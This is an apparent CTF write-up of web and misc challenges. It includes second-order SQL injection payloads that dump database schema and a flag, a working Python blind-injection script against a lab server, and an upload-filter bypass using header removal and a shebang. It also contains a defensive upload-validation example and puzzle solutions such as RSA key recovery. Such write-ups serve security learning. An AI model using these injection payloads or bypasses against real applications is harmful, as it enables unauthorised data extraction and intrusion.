I. Web
1. Are you in class
From the hint, the task is presumably to craft an X-Forwarded-For (XFF) header. Viewing the page source reveals a commented-out block.
Remove the comment markers, craft an XFF header with an address in the 192 range, submit, and the flag is returned.
2. Buy flag
The page requires registration. The registration form restricts the age field and checks that it is numeric; guessing that PHP's is_numeric() is used, this is bypassed with a hex-encoded value. After the bypass, logging in with the account shows that the home page has changed,
so age is presumably fed into a database query that looks up users with a smaller age, which suggests a second-order injection, similar in idea to the "three hit" challenge from QWB (强网杯). Re-registering with age set to the hex encoding of -1' and 1=1# returns the normal home page, while the hex encoding of -1' and 1=2# returns an abnormal one, confirming the second-order injection. Next, set age to -1' and 1=2 union select group_concat(schema_name) from information_schema.schemata#
to dump the database names, then -1' and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema='childhappy'# to dump the table names,
-1' and 1=2 union select group_concat(column_name) from information_schema.columns where table_schema='childhappy'# to dump the column names,
and -1' and 1=2 union select tsctf_fla9 from py_flag# to get the flag.
Later, from another player's writeup, I saw the blind injection done with a script, attached below:
# -*- coding: utf-8 -*-
import requests
import binascii
import random

url_register = "http://10.112.108.77:10002/register.php"
url_login = "http://10.112.108.77:10002/login.php"
url_index = "http://10.112.108.77:10002/index.php"
result = 'result:'
cookie = {
    "PHPSESSID": ""  # fill in
}

for i in range(1, 65):
    for j in range(32, 127):
        username = "asdf{0}".format(str(random.randint(0, 99999)))
        # table names: children, py_flag
        # age = "-1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}#".format(str(i), str(j))
        # column names: Id, tsctf_fla9
        # age = "-1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='py_flag'),{0},1))={1}#".format(str(i), str(j))
        # flag
        age = "-1' and ascii(substr((select tsctf_fla9 from py_flag),{0},1))={1}#".format(str(i), str(j))
        # hex-encode the payload so it passes the is_numeric() check
        age = binascii.hexlify(bytes(age, 'utf8'))
        age = "0x" + str(age, "utf8")
        data1 = {
            "user": username,
            "pass": "123456",
            "age": age
        }
        data2 = {
            "user": username,
            "pass": "123456"
        }
        # retry the request until it gets through
        while True:
            try:
                resp1 = requests.post(url=url_register, data=data1, cookies=cookie, allow_redirects=False)
                break
            except Exception as e:
                continue
        found = False
        while True:
            try:
                resp2 = requests.post(url=url_login, data=data2, cookies=cookie, allow_redirects=True)
                resp3 = requests.get(url=url_index, cookies=cookie)
                # print(resp3.text)
                if "asdf,bbb,123456" in resp3.text:
                    result += chr(j)
                    print(result)
                    found = True
                break  # leave the retry loop whether or not the guess matched
            except Exception as e:
                continue
        if found:
            break  # character i recovered, move on to the next position
3. upload easy
I didn't solve this during the contest; the approach also came from another player's writeup afterwards. After registering, the page contains a comment:
<!-- <li role="presentation"><a href="/hard_upload">上传</a></li>-->
After removing the comment, clicking upload leads to the upload page. Trying to upload a .py file gives a filename error, so the py extension is presumably filtered; renaming it to .txt gives a MIME type error. Capturing the request in Burp and deleting the Content-Type header makes the upload respond with "attack defend". Since a .py file has to be uploaded, change the first line of the txt file to #!/usr/bin/python (this line tells the operating system to invoke the python interpreter under /usr/bin when executing the script). Once this bypass succeeds, the flag can be purchased.
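As an added illustration from the defender's side (not the challenge's own code), the following Python models the two checks the writeup infers, an extension denylist plus trust in the client-supplied Content-Type header, next to a hardened validator that allowlists extensions, derives the type from the file bytes and rejects interpreter markers such as the shebang used above. The sample upload, the file-type table and both check functions are constructed assumptions.

```python
import re

# Constructed sample: the request from the writeup, a .txt upload with the
# Content-Type header removed and a Python shebang as its first line.
SAMPLE_UPLOAD = {
    "filename": "script.txt",
    "content_type": None,              # header deleted in the proxy
    "body": b"#!/usr/bin/python\nprint('buy flag')\n",
}

def weak_check(upload):
    """Hypothetical model of the challenge's filter: denylists one
    extension and trusts the client-supplied Content-Type header."""
    name = upload["filename"].lower()
    if name.endswith(".py"):
        return "name error"
    ctype = upload["content_type"]
    if ctype is not None and ctype not in ("text/plain", "image/png"):
        return "mime error"
    return "ok"                        # the sample passes: header is absent

# Hardened policy (constructed): allowlisted extension -> required magic bytes.
ALLOWED = {".txt": b"", ".png": b"\x89PNG\r\n\x1a\n"}
# Interpreter / script markers that must never appear in an uploaded file.
SCRIPT_MARKERS = (re.compile(rb"\A#!"), re.compile(rb"<\?php", re.I))

def hardened_check(upload):
    """Derives the type from the bytes, never from the client's header."""
    name = upload["filename"].lower()
    ext = name[name.rfind("."):] if "." in name else ""
    if ext not in ALLOWED:
        return "extension not allowed"
    body = upload["body"]
    if not body.startswith(ALLOWED[ext]):
        return "content does not match extension"
    if ext == ".txt" and b"\x00" in body:
        return "binary content in text file"
    if any(m.search(body[:512]) for m in SCRIPT_MARKERS):
        return "script content rejected"
    return "ok"
```

The weak check accepts the sample because the absent header skips the MIME branch; the hardened check rejects it on the shebang regardless of name or header.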
II. MISC
1. I Need Healing
Base64-decode the text and send the result to the WeChat official account to get the flag.
2. Simple RSA
Download the bmp image and open it in WinHex;
the strings e=, n= and cipher appear, and together with the title "RSA" this is clearly the hidden data. Extract the values and convert them to decimal, factor n on factordb to get p and q, then use a Python 2 script found online to compute d. The script follows:
# coding = utf-8
def computeD(fn, e):
    (x, y, r) = extendedGCD(fn, e)
    # y may be < 0, so bring it back into [0, fn)
    if y < 0:
        return fn + y
    return y

def extendedGCD(a, b):
    # a*xi + b*yi = ri
    if b == 0:
        return (1, 0, a)
    # a*x1 + b*y1 = a
    x1 = 1
    y1 = 0
    # a*x2 + b*y2 = b
    x2 = 0
    y2 = 1
    while b != 0:
        q = a // b  # integer division, works in both Python 2 and 3
        # ri = r(i-2) % r(i-1)
        r = a % b
        a = b
        b = r
        # xi = x(i-2) - q*x(i-1)
        x = x1 - q * x2
        x1 = x2
        x2 = x
        # yi = y(i-2) - q*y(i-1)
        y = y1 - q * y2
        y1 = y2
        y2 = y
    return (x1, y1, a)

p = 863653476616376575308866344984576466644942572246900013156919
q = 965445304326998194798282228842484732438457170595999523426901
e = 4097
n = p * q
fn = (p - 1) * (q - 1)
d = computeD(fn, e)
print(d)
With d in hand, running print(hex(pow(c,d,n))) in Python 3 gives a hex string; converting it to ASCII yields the flag.
3. Normal Magic Tower
Researching online shows the game was made with RPG Maker XP. Download RPG Maker XP, create a new project and save it, then copy the Data folder from the 正常的魔塔 game into the project, replacing its own Data folder. Reopen the project, go into the database editor, make the changes, save, and copy the modified Data folder back into the game. Then just start the game, clear it and defeat all the monsters to get the flag.
4. zhiyu's Short Video
Download the swf file and drag it into FFDec; following the hint, inspect its sprites.
The 7th sprite appears empty, which is odd; opening it reveals a very faint string. Export it as a PNG image
to read the string. Following the hint, switch to the Wubi (五笔) input method, which gives the sentence 一三五七八十腊,三十一天永不差 (the rhyme listing the months with 31 days). Extract the digits from it to get the flag.